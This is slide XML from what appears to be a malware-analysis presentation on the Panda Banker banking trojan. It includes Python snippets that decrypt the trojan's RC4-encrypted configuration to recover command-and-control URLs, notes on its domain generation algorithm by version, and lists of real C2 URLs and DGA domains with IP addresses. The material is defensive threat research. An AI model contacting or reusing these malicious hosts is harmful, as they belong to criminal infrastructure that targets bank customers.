              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1930785467"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="12191999" cy="5029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0469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BaseConfig C2s (2.1.0 – 2.5.7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974A1696-9B3B-DE43-AA02-5F41669F40D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="10972800" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>for i in range(len(base_config)):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	try_me = base_config[i:i+101]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	possible_c2 = rc4(base_config_key, try_me)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	if “http” in possible_c2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		print possible_c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2732081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BaseConfig C2s (2.6.x - present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974A1696-9B3B-DE43-AA02-5F41669F40D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="10972800" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>S = rc4_ksa(base_config_key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>i = S[256]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>j = S[257]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t># 30, 55, 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>for _ in range(30):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	# “I”, “B”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	in_buf = struct.pack(“I”, 0x0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>	for in_byte in in_buf:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>		(i, j, S, unused) = rc4_prga(i, j, S)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="651464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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://denatgruel.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>release.dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(January 2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://us-rboticks.ws/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config.dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(March 2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://abrakadabra2017.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3maufleawvoxawologuev.dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(May 2017)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://0532ae71ab47.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4gaxywuubduamfaarmylu.dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(January 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://ioxicjkdkc.abkhazia.su/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1ishuwuycywgeacqylyik.dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (June 2018)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://veintitna.ru/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4enmuotriloqeryezpiar.dat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(October 2018)</a:t>
            </a:r>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a:t>BaseConfig C2s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3730227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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BaseConfig DGA Endings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F749DA2D-D495-BD41-9050-3168DE463CCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="444500" y="1376515"/>
            <a:ext cx="11303000" cy="2501900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C640772-D31A-BC45-AEC4-77974EABFDD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="4267200"/>
            <a:ext cx="5334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Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
              <a:tabLst/>
              <a:defRPr sz="1800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="693738" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="922338" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1150938" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLs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47.com/conf.dat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>98.com/conf.dat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10.net/conf.dat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>98.net/conf.dat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3950556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Naming (Panel)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{520F6425-1FDA-8546-BC53-74D653FCF029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="6019800"/>
            <a:ext cx="11226215" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Source: https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A57EC70-7104-824E-BFF7-95010EEBF58F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1118937"/>
            <a:ext cx="5842000" cy="4749800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3102075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DGA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="62484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1A9F4F42-BF19-E04A-A6C2-F46EE0F63238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1168400"/>
          <a:ext cx="9305925" cy="5080000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C19A570B-E956-8741-843B-97821EC5101D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1168400"/>
            <a:ext cx="4103114" cy="4707340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1150194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52600"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">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Source: https://asert.arbornetworks.com/panda-bankers-future-dga/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DGA (2.2.1 – 2.2.9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A1CAE2-B1A1-C245-8ABF-8C7AD583C3C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1143000"/>
            <a:ext cx="4191000" cy="3624475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4042356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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DGA (2.2.10 – present)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F6CFB32-530A-BC46-8879-9751BE2DC334}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="1168400"/>
            <a:ext cx="10756900" cy="4521200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0A3BAC-0D64-6849-80BB-DF2B67FBD131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717550" y="5689600"/>
            <a:ext cx="9417050" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: https://github.com/tildedennis/malware/blob/master/panda_banker/dga.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1551058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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-3-12: d6b80c234347.com (146.185.243.116)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-4-18: 9eb318bf4a47.com (94.242.59.179)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-4-30: f075f7e31147.com (212.116.113.86)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-5-3: 9984c05a2447.com (185.244.150.46)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-5-15: d5465ea21847.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-5-18: 7f8e3a437647.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-6-1: 934f0d799f47.com (193.124.189.181)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-6-3: 6358968c2647.com (212.22.77.112)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-6-24: 52507833f147.com (168.235.96.67)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>2018-7-9: acbc2c8bf347.com (46.148.26.106)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
